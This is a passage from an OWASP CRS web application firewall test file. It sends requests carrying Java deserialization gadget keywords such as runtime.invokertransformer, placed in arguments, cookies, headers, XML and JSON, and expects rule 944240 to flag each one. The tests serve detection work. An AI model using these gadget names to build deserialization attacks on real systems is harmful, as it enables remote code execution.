Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-6 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Cookie name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-19 + desc: "Nested XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-20 + desc: "Content-Type text/plain includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-21 + desc: "Content-Type application/json arg value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-22 + desc: "Content-Type application/json arg name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-23 + desc: "Argument test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-24 + desc: "Argument name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-25 + desc: "Cookie test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-26 + desc: "Cookie name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-27 + desc: "Request header test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-28 + desc: "XML attribute value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-29 + desc: "XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-30 + desc: "Nested XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-31 + desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-32 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-33 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-34 + desc: "Argument test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-35 + desc: "Argument name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-36 + desc: "Cookie test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-37 + desc: "Cookie name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-38 + desc: "Request header test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-39 + desc: "XML attribute value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-40 + desc: "XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-41 + desc: "Nested XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-42 + desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-43 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-44 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-45 + desc: "Argument test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-46 + desc: "Argument name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-47 + desc: "Cookie test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-48 + desc: "Cookie name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-49 + desc: "Request header test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-50 + desc: "XML attribute value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-51 + desc: "XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-52 + desc: "Nested XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-53 + desc: "Content-Type text/plain includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-54 + desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-55 + desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-56 + desc: "Argument test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-57 + desc: "Argument name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-58 + desc: "Cookie test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 